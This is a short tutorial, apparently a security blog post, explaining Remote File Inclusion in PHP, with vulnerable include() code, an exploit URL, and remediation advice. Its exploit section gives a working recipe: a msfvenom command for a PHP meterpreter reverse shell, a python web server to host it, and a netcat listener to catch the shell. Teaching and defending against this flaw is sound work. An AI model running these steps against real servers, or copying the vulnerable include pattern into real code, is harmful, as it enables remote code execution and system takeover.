What is it?

When a web app takes user-controlled input (eg a url query string parameter) and passes it to an include command without sanitising it. The server then accesses the remote file which could be a reverse shell script or other malicious code.

May I see it?

Yes.

$incfile = $_REQUEST["file"];
include($incfile.".php");

Here, the file parameter is taken from the query string and passed into an include command. If the following request is made:

http://www.target.com/vuln_page.php?file=<attacker IP>/shell

the server will resolve it to:

<attacker IP>/shell.php

and will run any code within the attacker’s script.

How can I exploit it?

So, the attacker could generate a php reverse shell payload like so:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

host the payload

python -m http.server 443

set up a netcat listener

nc -lvnp <port>

and make the http call above. If the server is vulnerable, it will call the attacker’s ip, download the shell and run it. Netcat will then catch the reverse shell.

How do I remediate it?

Create an allowlist of known, safe values for file inclusion and accept only those. You could map simple numerical inputs like 1 to faq.txt and then reject all other values.

Create a denylist of known disallowed values.

Employ a specific naming scheme and check all provided values against it. Guard against double extensions such as file.txt.php

If feasible, use a jail or sandboxing strategy such as chroot() to limit the locations that the process can access.

References & Further Reading

http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion

https://www.zaproxy.org/docs/alerts/7/